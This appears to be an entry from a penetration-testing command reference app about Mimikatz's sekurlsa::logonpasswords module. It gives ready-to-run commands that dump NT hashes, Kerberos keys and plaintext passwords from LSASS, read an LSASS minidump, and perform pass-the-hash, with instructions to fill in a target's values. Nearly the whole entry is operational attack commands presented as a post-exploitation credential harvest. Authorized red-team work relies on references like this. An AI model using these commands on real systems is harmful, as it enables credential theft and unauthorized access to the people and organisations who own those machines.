Mimikatz sekurlsa::logonpasswords

Dump credentials (NT hashes, Kerberos keys, plaintext where wdigest is enabled, MSV1_0) from LSASS for every active logon session. The classic post-exploit credential harvest. Requires SeDebugPrivilege.

Tool
mimikatz.exe
Category
Credential Attacks / Hash Dumping
Platform
windows
Requires
local admin

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Credential variants

The same attack using a different authentication material.

From LSASS Minidump requires local admin

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

Pass-the-Hash requires local admin

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<nt-hash> /run:cmd.exe" exit

Examples

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Tags

mimikatz sekurlsa lsass credential-dump